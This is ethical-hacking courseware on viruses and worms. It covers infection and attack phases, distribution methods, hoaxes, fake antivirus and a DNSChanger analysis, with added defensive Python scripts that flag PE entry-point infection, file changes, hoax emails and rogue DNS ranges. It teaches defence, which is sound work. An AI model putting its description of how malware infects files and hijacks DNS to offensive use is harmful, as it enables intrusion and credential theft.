Ethical Hacking and Countermeasures v8
Module 07: Viruses and Worms
Exam 312-50 Certified Ethical Hacker
Engineered by Hackers. Presented by Professionals.

Module 07 Page 1007
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Security News

Global Cyber-Warfare Tactics: New Flame-linked Malware used in "Cyber-Espionage"
GlobalResearch, October 19, 2012
Source: http://www.globalresearch.ca

A new cyber espionage program linked to the notorious Flame and Gauss malware has been detected by Russia's Kaspersky Lab. The antivirus giant's chief warns that global cyber warfare is in "full swing" and will probably escalate in 2013.

The virus, dubbed miniFlame, and also known as SPE, has already infected computers in Iran, Lebanon, France, the United States, and Lithuania. It was discovered in July 2012 and is described as "a small and highly flexible malicious program designed to steal data and control infected systems during targeted cyber espionage operations," Kaspersky Lab said in a statement posted on its website.

The malware was originally identified as an appendage of Flame, the program used for targeted cyber espionage in the Middle East and acknowledged to be part of joint US-Israeli efforts to undermine Iran's nuclear program.

But later, Kaspersky Lab analysts discovered that miniFlame is an "interoperable tool that could be used as an independent malicious program, or concurrently as a plug-in for both the Flame and Gauss malware."

The analysis also showed new evidence of cooperation between the creators of Flame and Gauss, as both viruses can use miniFlame for their operations.

"MiniFlame's ability to be used as a plug-in by either Flame or Gauss clearly connects the collaboration between the development teams of both Flame and Gauss. Since the connection between Flame and Stuxnet/Duqu has already been revealed, it can be concluded that all these advanced threats come from the same 'cyber warfare' factory," Kaspersky Lab said.

High-precision attack tool

So far just 50 to 60 cases of infection have been detected worldwide, according to Kaspersky Lab. But unlike Flame and Gauss, miniFlame is meant for installation on machines already infected by those viruses.

"MiniFlame is a high-precision attack tool. Most likely it is a targeted cyber weapon used in what can be defined as the second wave of a cyber attack," Kaspersky's Chief Security Expert Alexander Gostev explained.

"First, Flame or Gauss are used to infect as many victims as possible to collect large quantities of information. After data is collected and reviewed, a potentially interesting victim is defined and identified, and miniFlame is installed in order to conduct more in-depth surveillance and cyber-espionage."

The newly-discovered malware can also take screenshots of an infected computer while it is running a specific program or application such as a web browser, Microsoft Office program, Adobe Reader, instant messenger service or FTP client.

Kaspersky Lab believes miniFlame's developers have probably created dozens of different modifications of the program. "At this time, we have only found six of these, dated 2010-2011," the firm said.

'Cyber warfare in full swing'

Meanwhile, Kaspersky Lab's co-founder and CEO Eugene Kaspersky warned that global cyber warfare tactics are becoming more sophisticated while also becoming more threatening. He urged governments to work together to fight cyber warfare and cyber-terrorism, Xinhua news agency reports.

Speaking at an International Telecommunication Union Telecom World conference in Dubai, the antivirus tycoon said, "cyber warfare is in full swing and we expect it to escalate in 2013."

"The latest malicious virus attack on the world's largest oil and gas company, Saudi Aramco, last August shows how dependent we are today on the Internet and information technology in general, and how vulnerable we are," Kaspersky said.

He stopped short of blaming any particular player behind the massive cyber-attacks across the Middle East, pointing out that "our job is not to identify hackers or cyber-terrorists. Our firm is like an X-ray machine, meaning we can scan and identify a problem, but we cannot say who or what is behind it."

Iran, which confirmed that it suffered an attack by Flame malware that caused severe data loss, blames the United States and Israel for unleashing the cyber-attacks.

Copyright © 2005-2012 GlobalResearch.ca
By Russia Today

http://www.globalresearch.ca/global-cyber-warfare-tactics-new-flame-linked-malware-used-incyber-espionage/5308867

Module Objectives

- Introduction to Viruses
- Stages of Virus Life
- Working of Viruses
- Indications of Virus Attack
- How Does a Computer Get Infected by Viruses
- Virus Analysis
- Types of Viruses
- Virus Maker
- Computer Worms
- Worm Analysis
- Worm Maker
- Malware Analysis Procedure
- Online Malware Analysis Services
- Virus and Worms Countermeasures
- Antivirus Tools
- Penetration Testing for Virus

Module Objectives

The objective of this module is to expose you to the viruses and worms in circulation today and to the countermeasures available against them. It examines how a computer virus works, its functions and classification, and the manner in which it affects systems. The main objective is to teach you how to recognize the indications of a virus or worm attack, how to protect against infection, and how to test your system or network for the presence of viruses or worms.

This module will familiarize you with the topics listed above.

Module Flow

- Virus and Worms Concepts
- Types of Viruses
- Computer Worms
- Malware Analysis
- Countermeasures
- Penetration Testing

Module Flow

This section introduces you to the viruses and worms in circulation today, gives a brief overview of each, and presents statistics on viruses and worms in recent years. It lists the various types of viruses and their effects on your system. The working of viruses in each phase will be discussed in detail, and the techniques attackers use to distribute malware on the web are highlighted.

Introduction to Viruses

- A virus is a self-replicating program that produces its own copy by attaching itself to another program, computer boot sector or document
- Viruses are generally transmitted through file downloads, infected disk/flash drives and as email attachments

Virus Characteristics: alters data, infects other programs, corrupts files and programs, transforms itself, encrypts itself, self propagates

Introduction to Viruses

Computer viruses have the potential to wreak havoc on both business and personal computers. Worldwide, most businesses have been infected at some point. A virus is a self-replicating program that propagates its own code by attaching copies of itself to other executable code. A virus operates without the knowledge or consent of the user. Like a biological virus, a computer virus is contagious and can contaminate other files. However, viruses can reach other machines only with the assistance of computer users (copying an infected file, opening an attachment, booting from an infected disk). Some viruses act as soon as their code is executed; others lie dormant until a predetermined logical condition is met. There are three categories of malicious programs:

- Trojans and rootkits
- Viruses
- Worms

A worm is a malicious program that can infect both local and remote machines. Worms spread automatically by infecting system after system in a network, and even spread further to other networks. Therefore, worms have a greater potential for causing damage because they do not rely on the user's actions for execution. There are also malicious programs in the wild that combine the features of all three categories.


Virus and Worm Statistics

Source: http://www.av-test.org

FIGURE 7.1: Virus and Worm Statistics (bar chart, one bar per year from 2008 to 2012, y-axis from 0 to 75,000,000)

This graphical representation gives detailed information about the attacks that have occurred in recent years. According to the graph, 11,666,667 systems were affected by viruses and worms in 2008, whereas in 2012 the count rose to 70,000,000 systems, which means that the number of malware attacks on systems is growing rapidly year on year.


Stages of Virus Life

Design: developing virus code using programming languages or construction kits
Replication: the virus replicates for a period of time within the target system and then spreads itself
Launch: it gets activated when the user performs certain actions such as running an infected program
Detection: a virus is identified as a threat infecting target systems
Incorporation: antivirus software developers assimilate defenses against the virus
Elimination: users install antivirus updates and eliminate the virus threats

Stages of Virus Life

Computer virus attacks pass through several stages, from inception and design through to elimination.

1. Design: Virus code is developed using programming languages or construction kits. Anyone with basic programming knowledge can create a virus.

2. Replication: The virus first replicates itself within a target system over a period of time.

3. Launch: It is activated when a user performs certain actions, such as running an infected program.

4. Detection: The virus is identified as a threat infecting target systems. Its actions cause considerable damage to the target system's data.

5. Incorporation: Antivirus software developers assemble defenses (signatures and updates) against the virus.

6. Elimination: Users install antivirus software updates that remove the virus, and awareness of the threat spreads among user groups.


Working of Viruses: Infection Phase

- In the infection phase, the virus replicates itself and attaches to an .exe file in the system

Working of Viruses: Infection Phase

Viruses attack a target host's system by using various methods. They attach themselves to programs and transmit themselves to other programs by making use of certain events. Viruses need such events to take place since they cannot:

- Start themselves
- Infect hardware
- Cause physical damage to a computer
- Transmit themselves using files that are never executed or interpreted (a document carrying macros counts as executable content, which is why macro viruses spread through Word files)

Generally viruses have two phases, the infection phase and the attack phase.

In the infection phase, the virus replicates itself and attaches to an .exe file in the system. Programs modified by a virus infection can enable virus functionality to run on that system. Viruses get enabled as soon as the infected program is executed, since the program code leads to the virus code. Virus writers have to maintain a balance among factors such as:

- How will the virus infect?
- How will it spread?
- How will it reside in a target computer's memory without being detected?

Obviously, viruses have to be triggered and executed in order to function. There are many ways to execute programs while a computer is running. For example, any setup program calls numerous programs that may be built into a system, and some of these are distribution-medium programs. Thus, if a virus program already exists, it can be activated by this kind of execution and infect the additional setup program as well.

There are virus programs that infect and keep spreading every time they are executed. Other programs do not infect when first executed: they reside in a computer's memory and infect programs at a later time. Such terminate-and-stay-resident (TSR) viruses wait for a specified trigger event before spreading. It is, therefore, difficult to recognize which event might trigger the execution of a dormant virus infection.

Refer to the figure that follows to see how EXE file infection works. The .EXE file's header, when triggered, executes and starts running the application. Once the file is infected, the entry point recorded in the header leads to the virus code, so any trigger event that starts the application activates the virus code as well.

- A file virus infects by attaching itself to an executable system or application program. Text files such as source code, batch files, script files, etc., are also potential targets for virus infection because they are interpreted and executed.
- Boot sector viruses execute their own code first, before the operating system on the target PC is loaded, because the firmware runs the boot sector code before anything else.


FIGURE 7.2: Working of Viruses in Infection Phase (before infection: clean .exe file; after infection: virus-infected .exe file)
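The following check is an added example, not code from the EC-Council courseware. It turns the "clean file / infected file" picture above into something you can run against a binary: an appending file infector puts its body in a new or enlarged last section and rewrites AddressOfEntryPoint so that the virus code runs before the original program, so the section that owns the entry point is where the evidence is. The parser reads only the PE fields it needs and reports the usual warning signs. Everything specific to the samples is an assumption for the demonstration: the two PE images are tiny synthetic files built in memory by build_pe (not real programs, not real malware), the section name .vir, the entropy threshold of 7.0 and the list of "usual" code section names are heuristics chosen here, and the hash-chain filler merely stands in for an encrypted virus body.

```python
# Added example (not EC-Council's code). Heuristic check for appended-code
# infection of a PE32 file. The sample images are constructed in memory; the
# thresholds and section-name list are assumptions for this demonstration.
import hashlib
import math
import struct
from collections import Counter

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
USUAL_CODE_SECTIONS = {".text", "CODE", ".code"}          # assumption: common compiler names
SECTION_FMT = "<8sIIIIIIHHI"                              # IMAGE_SECTION_HEADER, 40 bytes
OPT_FMT = "<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6   # PE32 optional header, 96 bytes


def build_pe(sections, entry_rva, file_align=0x200):
    """Assemble a minimal synthetic PE32 image from (name, rva, characteristics, raw) tuples."""
    opt_size = struct.calcsize(OPT_FMT)
    hdr_len = 0x40 + 4 + 20 + opt_size + 40 * len(sections)
    raw_ptr = -(-hdr_len // file_align) * file_align      # first section data, file-aligned
    table, body = b"", b""
    for name, rva, chars, raw in sections:
        padded = raw + b"\0" * (-len(raw) % file_align)
        table += struct.pack(SECTION_FMT, name.encode().ljust(8, b"\0"), len(raw), rva,
                             len(padded), raw_ptr + len(body), 0, 0, 0, 0, chars)
        body += padded
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = struct.pack(OPT_FMT, 0x10B, 14, 0, 0, 0, 0, entry_rva, 0x1000, 0x2000,
                      0x400000, 0x1000, file_align, 6, 0, 0, 0, 6, 0, 0, 0x10000,
                      raw_ptr, 0, 3, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 0)
    headers = dos + b"PE\0\0" + coff + opt + table
    return headers + b"\0" * (raw_ptr - len(headers)) + body


def shannon_entropy(blob):
    """Bits per byte: plain machine code is usually well below 7, packed or encrypted data near 8."""
    if not blob:
        return 0.0
    n = len(blob)
    return -sum(c / n * math.log2(c / n) for c in Counter(blob).values())


def entry_point_findings(data):
    """Return the suspicious observations about the section that owns the entry point."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    nsections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    entry_rva = struct.unpack_from("<I", data, e_lfanew + 24 + 16)[0]   # AddressOfEntryPoint
    table = e_lfanew + 24 + opt_size
    sections = [struct.unpack_from(SECTION_FMT, data, table + 40 * i) for i in range(nsections)]
    owner = next((i for i, s in enumerate(sections)
                  if s[2] <= entry_rva < s[2] + max(s[1], s[3])), None)
    if owner is None:
        return ["entry point 0x%x lies outside every section" % entry_rva]
    name, _, _, raw_size, raw_ptr, _, _, _, _, chars = sections[owner]
    sname = name.rstrip(b"\0").decode("latin-1")
    findings = []
    if len(sections) > 1 and owner == len(sections) - 1:
        findings.append("entry point is in the last section (%s), typical of appended code" % sname)
    if chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE:
        findings.append("entry section %s is both writable and executable" % sname)
    if sname not in USUAL_CODE_SECTIONS:
        findings.append("entry section is named %r, not a usual code section" % sname)
    ent = shannon_entropy(data[raw_ptr:raw_ptr + raw_size])
    if ent > 7.0:
        findings.append("entry section %s has entropy %.2f, looks packed or encrypted" % (sname, ent))
    return findings


def filler_bytes(n, seed=b"constructed sample"):
    """Deterministic high-entropy bytes standing in for an encrypted virus body."""
    out, block = b"", seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


RX = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
RW = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
CODE = b"\x55\x8b\xec" + b"\x90" * 509                    # constructed: a prologue and a NOP sled
# Constructed "before infection": the entry point sits inside .text.
CLEAN_EXE = build_pe([(".text", 0x1000, RX, CODE), (".data", 0x2000, RW, b"hello\0")], 0x1010)
# Constructed "after infection": an appended RWX section now owns the entry point.
INFECTED_EXE = build_pe([(".text", 0x1000, RX, CODE), (".data", 0x2000, RW, b"hello\0"),
                         (".vir", 0x3000, RX | IMAGE_SCN_MEM_WRITE, filler_bytes(4096))], 0x3000)

if __name__ == "__main__":
    for label, image in (("clean", CLEAN_EXE), ("infected", INFECTED_EXE)):
        print(label, entry_point_findings(image) or ["no findings"])
```

Run it on a real file by passing open(path, "rb").read() to entry_point_findings. Each finding on its own is only a hint (legitimate packers also produce high-entropy last sections), which is why the check reports all of them rather than a single verdict; compare the result with a hash of the same file taken when it was known clean before drawing a conclusion.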


Working of Viruses: Attack Phase

- Viruses are programmed with trigger events to activate and corrupt systems
- Some viruses infect each time they are run and others infect only when a certain predefined condition is met, such as a user's specific task, a day, time, or a particular event


Working of Viruses: Attack Phase

Once viruses spread themselves throughout the target system, they start corrupting the files and programs of the host system. Some viruses have trigger events that need to occur before they corrupt the host system. Some carry payload routines that, once resident, delete files or keep the system busy, increasing session time.

They corrupt their targets only after spreading as intended by their developers. Most viruses that attack target systems perform actions such as:

- Deleting files and altering content in data files, thereby causing the system to slow down
- Performing tasks not related to applications, such as playing music and creating animations

FIGURE 7.3: Working of Viruses in Attack Phase (unfragmented files before attack: File A pages 1 to 3 followed by File B pages 1 to 3; after the attack the pages of File A and File B are interleaved on disk)

Refer to this figure, which has two files, A and B. In section one, the two files are located one after the other in an orderly fashion. Once virus code infects the files, it alters the positioning of the pages that were consecutively placed, thus leading to inaccuracy in file allocations and causing the system to slow down as users try to retrieve their files. In this phase:

- Viruses execute when some events are triggered
- Some execute and corrupt via built-in payload routines after being stored in the host's memory
- Most viruses are written to conceal their presence, attacking only after spreading in the host to the fullest extent



Why Do People Create Computer Viruses?

- Inflict damage to competitors
- Financial benefits
- Research projects
- Play a prank
- Vandalism
- Cyber terrorism
- Distribute political messages

Why Do People Create Computer Viruses?

Source: http://www.securitydocs.com

Computer viruses are not self-generated; they are created by criminal minds and intentionally designed to cause destructive events in a system. Generally, viruses are created with a disreputable motive. Cyber-criminals create viruses to destroy a company's data, as an act of vandalism or a prank, or to damage a company's products. In some cases, however, viruses are claimed to be intended for good: so-called beneficial viruses designed to improve a system's performance by removing previously embedded viruses from files. Some reasons viruses have been written include:

- Inflict damage to competitors
- Research projects
- Pranks
- Vandalism
- Attack the products of specific companies
- Distribute political messages
- Financial gain
- Identity theft
- Spyware
- Cryptoviral extortion



Indications of Virus Attacks

An effective virus tends to multiply rapidly and may infect a number of machines within three to five days. Viruses can infect Word files which, when transferred, can infect the machines of the users who receive them. A virus can also make good use of file servers in order to infect files. The following are indications of a virus attack on a computer system:

- Processes take more resources and time
- The computer slows down when programs start
- The computer freezes frequently or encounters errors
- Programs take longer to load
- The hard drive is always full, even without installing any programs
- The floppy disk drive or hard drive runs when it is not being used
- Unknown files keep appearing on the system
- The keyboard or the computer emits strange or beeping sounds
- The computer monitor displays strange graphics
- File names turn strange, often beyond recognition
- The hard drive becomes inaccessible when trying to boot from the floppy drive
- A program's size keeps changing
- The memory on the system seems to be in use and the system slows down
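Several of the symptoms above (a program whose size keeps changing, unknown files appearing) are only visible against a known-good baseline. The following Python script is an added example, not code from the module: it builds a size-and-hash manifest of a directory tree, then compares a later snapshot against it and reports new, removed and changed files. The directory, the file names and the two changes it detects are constructed in a temporary folder purely for the demonstration.

```python
"""File-system baseline check for virus-attack symptoms (added example).

Builds a manifest of a directory tree (size + SHA-256 per file) and diffs a
later manifest against it.  The sample tree below is constructed in a
temporary directory; nothing here comes from the original module.
"""
import hashlib
import os
import tempfile
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Stream a file through SHA-256 so large binaries do not load into memory."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root: Path) -> dict:
    """Map relative POSIX path -> (size, sha256) for every regular file under root."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = Path(dirpath) / name
            rel = full.relative_to(root).as_posix()
            manifest[rel] = (full.stat().st_size, sha256_of(full))
    return manifest


def diff_manifests(baseline: dict, current: dict) -> dict:
    """Return sorted lists of files that are new, removed, or changed in size/hash."""
    new = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = sorted(
        path for path in set(baseline) & set(current) if baseline[path] != current[path]
    )
    return {"new": new, "removed": removed, "changed": changed}


def demo() -> dict:
    """Constructed scenario: baseline a tree, then reproduce two of the symptoms."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "bin" / "editor.exe").write_bytes(b"MZ" + b"\x00" * 1022)
        (root / "bin" / "calc.exe").write_bytes(b"MZ" + b"\x00" * 510)
        baseline = build_manifest(root)

        # "A program's size keeps changing": bytes are appended to editor.exe.
        with (root / "bin" / "editor.exe").open("ab") as handle:
            handle.write(b"\x90" * 256)
        # "Unknown files keep appearing on the system": a file nobody installed.
        (root / "bin" / "unknown.exe").write_bytes(b"MZ" + b"\x00" * 100)

        return diff_manifests(baseline, build_manifest(root))


if __name__ == "__main__":
    print(demo())
```

In practice the baseline manifest is written to read-only or offline storage right after a clean install, and the comparison is scheduled; a manifest kept on the same writable disk can be edited by the same code that changed the files.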


How Does a Computer Get Infected by Viruses?

There are many ways in which a computer gets infected by viruses. The most popular methods are as follows:

- When a user accepts files and downloads without checking properly for the source.
- Attackers usually send virus-infected files as email attachments to spread the virus on the victim's system. If the victim opens the mail, the virus automatically infects the system.
- Attackers incorporate viruses in popular software programs and upload the infected software on websites intended for software downloads. When the victim downloads the infected software and installs it, the system gets infected.
- Failing to install new versions or update with the latest patches intended to fix the known bugs may expose your system to viruses.
- As technology advances, attackers also design new viruses. Failing to use the latest antivirus applications may expose you to virus attacks.


Common Techniques Used to Distribute Malware on the Web

Source: Security Threat Report 2012 (http://www.sophos.com)

Blackhat Search Engine Optimization (SEO): Using this technique the attacker ranks malware pages high in search results.

Social Engineered Click-jacking: The attackers trick users into clicking on innocent-looking web pages that contain malware.

Spearphishing Sites: This technique mimics legitimate institutions, such as banks, in an attempt to steal account login credentials.

Malvertising: Embeds malware in ad networks that display across hundreds of legitimate, high-traffic sites.

Compromised Legitimate Websites: Host embedded malware that spreads to unsuspecting visitors.

Drive-by Downloads: The attacker exploits flaws in browser software to install malware just by the user visiting a web page.


Virus Hoaxes and Fake Antiviruses

Virus Hoaxes

A virus hoax is simply a bluff. Viruses, by their nature, have always created a horrifying impression. Hoaxes are typically untrue scare alerts that unscrupulous individuals send to create havoc. It is fairly common for innocent users to pass these phony messages along thinking they are helping others avoid the "virus."

- Hoaxes are false alarms claiming reports about non-existing viruses
- These warning messages, which can be propagated rapidly, state that a certain email message should not be opened, and that doing so would damage one's system
- In some cases, these warning messages themselves contain virus attachments
- These possess the capability of vast destruction on target systems

Many hoaxes try to "sell" things that are technically nonsense. Nevertheless, the hoaxer has to be somewhat of an expert to spread hoaxes in order to avoid being identified and caught. Therefore, it is a good practice to look for technical details about how to become infected. Also search for information in the wild to learn more about the hoax, especially by scanning bulletin boards where people actively discuss current happenings in the community.


Try to cross-check the identity of the person who has posted the warning. Also look for more information about the hoax/warning from secondary sources. Before jumping to conclusions by reading certain documents on the Internet, check the following:

- If it is posted by newsgroups that are suspicious, cross-check the information with another source
- If the person who has posted the news is not a known person in the community or an expert, cross-check the information with another source
- If a government body has posted the news, the posting should also have a reference to the corresponding federal regulation
- One of the most effective checks is to look up the suspected hoax virus by name on antivirus software vendor sites
- If the posting is technical, hunt for sites that would cater to the technicalities, and try to authenticate the information

Subject: FORWARD THIS WARNING AMONG FRIENDS, FAMILY AND CONTACTS
PLEASE FORWARD THIS WARNING AMONG FRIENDS, FAMILY AND CONTACTS! You should be alert during the next few days. Do not open any message with an attachment entitled 'POSTCARD FROM BEJING' or 'RESIGNATION OF BARACK OBAMA', regardless of who sent it to you. It is a virus that opens A POSTCARD IMAGE, then 'burns' the whole hard C disc of your computer.
This is the worst virus announced by CNN last evening. It has been classified by Microsoft as the most destructive virus ever. The virus was discovered by McAfee yesterday, and there is no repair yet for this kind of virus.
This virus simply destroys the Zero Sector of the Hard Disc, where the vital information is kept.
COPY THIS E MAIL, AND SEND IT TO YOUR FRIENDS. REMEMBER: IF YOU SEND IT TO THEM, YOU WILL BENEFIT ALL OF US.
End-of-mail
Thanks.

FIGURE 7.3: Hoaxes Warning Message
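The checks listed above can be partly mechanised for a mail gateway or a help desk. The Python script below is an added example, not part of the module: it scores a message against hoax tell-tales taken from this discussion (a request to forward it to everyone, appeals to named authorities, superlative threat claims, a claim that no repair exists, physically implausible damage, the absence of any verifiable link, and shouting in capitals). The sample input is the message reproduced in Figure 7.3; the benign comparison message, the indicator list and the weights are this example's own constructions.

```python
"""Heuristic triage of a suspected virus hoax (added example, not from the module)."""
import re

# The hoax message reproduced in Figure 7.3 above, used here as sample input.
HOAX_MESSAGE = """Subject: FORWARD THIS WARNING AMONG FRIENDS, FAMILY AND CONTACTS
PLEASE FORWARD THIS WARNING AMONG FRIENDS, FAMILY AND CONTACTS! You should be alert during
the next few days. Do not open any message with an attachment entitled 'POSTCARD FROM BEJING' or
'RESIGNATION OF BARACK OBAMA', regardless of who sent it to you. It is a virus that opens A
POSTCARD IMAGE, then 'burns' the whole hard C disc of your computer.
This is the worst virus announced by CNN last evening. It has been classified by Microsoft as the most
destructive virus ever. The virus was discovered by McAfee yesterday, and there is no repair yet for this
kind of virus.
This virus simply destroys the Zero Sector of the Hard Disc, where the vital information is kept.
COPY THIS E MAIL, AND SEND IT TO YOUR FRIENDS. REMEMBER: IF YOU SEND IT TO THEM, YOU WILL
BENEFIT ALL OF US."""

# Constructed benign comparison: a vendor-style advisory that points at a checkable reference.
BENIGN_MESSAGE = """Advisory: a new variant of a known worm is being tracked.
Details and removal instructions: https://example.com/advisory/placeholder
Update antivirus signatures and apply vendor updates."""

# (name, case-insensitive pattern, weight); the weights are this example's own choice.
INDICATORS = [
    ("chain-letter forwarding request", r"\b(forward|send|copy)\s+(this|it)\b", 3),
    ("appeal to named authorities", r"\b(cnn|microsoft|mcafee|symantec|norton)\b", 1),
    ("superlative threat claim", r"\b(worst|most\s+destructive)\s+virus\b", 2),
    ("claims no fix exists", r"\bno\s+(repair|fix|cure|patch)\b", 2),
    ("physical-destruction claim",
     r"\b(burns?|destroys?|melts?)\b.{0,30}\b(hard|disc|disk|drive)\b", 2),
]


def score_message(text: str):
    """Return (score, matched indicator names) for one message."""
    hits, score = [], 0
    for name, pattern, weight in INDICATORS:
        if re.search(pattern, text, re.IGNORECASE | re.DOTALL):
            hits.append(name)
            score += weight
    # A genuine alert names something you can look up; hoaxes almost never link anywhere.
    if not re.search(r"https?://|www\.", text, re.IGNORECASE):
        hits.append("no verifiable reference (no URL)")
        score += 2
    # Shouting: more than 30% of the letters are upper case.
    letters = [c for c in text if c.isalpha()]
    if letters and sum(c.isupper() for c in letters) / len(letters) > 0.3:
        hits.append("shouting (mostly upper case)")
        score += 1
    return score, hits


def classify(score: int) -> str:
    """Map a score to a triage verdict; thresholds are this example's choice."""
    if score >= 6:
        return "likely hoax"
    if score >= 3:
        return "suspicious"
    return "no hoax indicators"


if __name__ == "__main__":
    for label, msg in (("hoax", HOAX_MESSAGE), ("benign", BENIGN_MESSAGE)):
        score, hits = score_message(msg)
        print(label, score, classify(score), hits)
```

A "suspicious" or "likely hoax" verdict is a prompt to do the checks above (look the name up on an antivirus vendor's site, identify the poster), not a reason to forward the message on with a correction attached.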

Fake Antiviruses

A fake antivirus is a method hackers use to compromise a system: it can poison the system and corrupt the registry and system files to allow the attacker to take full control of, and access to, your computer. It appears and performs similarly to a real antivirus program. Fake antivirus programs first appear in different browsers and warn users that they have various security threats on their system, and this message is backed up by real-looking suspicious viruses. When the user tries to remove the viruses, they are navigated to another page where they need to buy or subscribe to that antivirus and proceed to payment details. These fake antivirus programs have been fabricated in such a way that they draw the attention of the unsuspecting user into installing the software.

Some of the methods used to extend the usage and installation of fake antivirus programs include:

- Email and messaging: Attackers use spam email and social networking messages to spread this type of infected email to users and prompt the user to open the attachments for software installation.
- Search engine optimization: Attackers generate pages related to public or current search terms and plant them to appear as extraordinary and the latest in search engine results. The web pages show alerts about infection that encourage the user to buy the fake antivirus.
- Compromised websites: Attackers secretly break into popular sites to install the fake antiviruses, which can be used to entice users to download the fake antivirus by relying on the site's popularity.

FIGURE 7.4: Example of a Fake Antivirus


Virus Analysis: DNSChanger

Source: http://www.totaldefense.com

DNSChanger (Alureon) is malware that spreads through emails, social engineering tricks, and untrusted downloads from the Internet. It acts as a bot and can be organized into a botnet and controlled from a remote location. It modifies the DNS settings on the victim PC to divert Internet traffic to malicious websites in order to generate fraudulent ad revenue, sell fake services, or steal personal financial information.

DNSChanger achieves the DNS redirection by modifying the following registry key setting against an interface device such as a network card:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\%Random CLSID%\NameServer

DNSChanger has received significant attention due to the large number of affected systems worldwide and the fact that, as part of the botnet takedown, the FBI took ownership of the rogue DNS servers to ensure those affected did not immediately lose the ability to resolve DNS names.


Virus Analysis: DNSChanger (Cont'd)

Source: http://www.totaldefense.com

The rogue DNS servers can exist in any of the following ranges:

64.28.176.0 - 64.28.191.255
67.210.0.0 - 67.210.15.255
77.67.83.0 - 77.67.83.255
93.188.160.0 - 93.188.167.255
85.255.112.0 - 85.255.127.255
213.109.64.0 - 213.109.79.255


FIGURE 7.5: Virus Analysis Using DNSChanger (diagram labels: the victim asks "What is the IP address of www.xsecurity.com?"; the DNS request goes to 64.28.176.2; the attacker runs a DNS server in Russia (IP: 64.28.176.2); DNSChanger infects the victim's computer by changing her DNS IP address to 64.28.176.2; fake website IP: 65.0.0.2; real website www.xsecurity.com, IP: 200.0.0.45; DNSChanger sniffs the credential and redirects the request to the real website)

To infect the system and steal credentials, the attacker first has to run a DNS server. Here the attacker runs his or her DNS server in Russia with an IP of, say, 64.28.176.2. Next, the attacker infects the victim's computer by changing his or her DNS IP address to 64.28.176.2. When this malware has infected the system, it entirely changes the DNS settings of the infected machine and forces all DNS requests to go to the DNS server run by the attacker. After the DNS setting has been altered, any request made by the system is sent to the malicious DNS server. Here, the victim sends the DNS request "What is the IP address of www.xsecurity.com?" to 64.28.176.2. The attacker responds to the request with 65.0.0.2 as the address of www.xsecurity.com. When the victim's browser connects to 65.0.0.2, it reaches a fake website created by the attacker at that IP. DNSChanger sniffs the credentials (username, passwords) and redirects the request to the real website (www.xsecurity.com) with IP 200.0.0.45.
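A defender's first check for this infection is whether any configured resolver falls inside the rogue ranges listed above. The Python script below is an added example, not material from Total Defense or the module: it expands the six ranges into CIDR networks with the standard-library ipaddress module and audits NameServer strings in the comma- or space-separated form Windows keeps under the Interfaces key named earlier. The interface IDs and resolver values are constructed placeholders; reading them from the live registry (for instance with the winreg module on Windows) is left out so the script runs anywhere.

```python
"""Audit configured DNS resolvers against the DNSChanger rogue ranges (added example)."""
import ipaddress

# The six ranges quoted in the text above (first address, last address).
ROGUE_RANGES = [
    ("64.28.176.0", "64.28.191.255"),
    ("67.210.0.0", "67.210.15.255"),
    ("77.67.83.0", "77.67.83.255"),
    ("93.188.160.0", "93.188.167.255"),
    ("85.255.112.0", "85.255.127.255"),
    ("213.109.64.0", "213.109.79.255"),
]

# Expand each first/last pair into the CIDR networks that cover exactly that range.
ROGUE_NETWORKS = [
    network
    for first, last in ROGUE_RANGES
    for network in ipaddress.summarize_address_range(
        ipaddress.IPv4Address(first), ipaddress.IPv4Address(last)
    )
]


def is_rogue(ip: str) -> bool:
    """True if the IPv4 address lies in any DNSChanger range."""
    address = ipaddress.IPv4Address(ip)
    return any(address in network for network in ROGUE_NETWORKS)


def parse_nameserver_value(value: str) -> list:
    """Split a NameServer REG_SZ value ("a,b" or "a b") into individual addresses."""
    return [token for token in value.replace(",", " ").split() if token]


def audit_interfaces(interfaces: dict) -> dict:
    """interfaces: {interface id: NameServer string}.  Returns {id: [rogue ips]} for hits only."""
    findings = {}
    for interface_id, value in interfaces.items():
        rogue = [ip for ip in parse_nameserver_value(value) if is_rogue(ip)]
        if rogue:
            findings[interface_id] = rogue
    return findings


# Constructed sample: interface IDs are placeholders, not real CLSIDs.
SAMPLE_INTERFACES = {
    "{PLACEHOLDER-CLSID-1}": "64.28.176.2,8.8.8.8",
    "{PLACEHOLDER-CLSID-2}": "192.168.1.1",
    "{PLACEHOLDER-CLSID-3}": "85.255.112.10 85.255.127.255",
}

if __name__ == "__main__":
    for interface_id, rogue in audit_interfaces(SAMPLE_INTERFACES).items():
        print(f"{interface_id}: rogue resolver(s) {rogue}")
```

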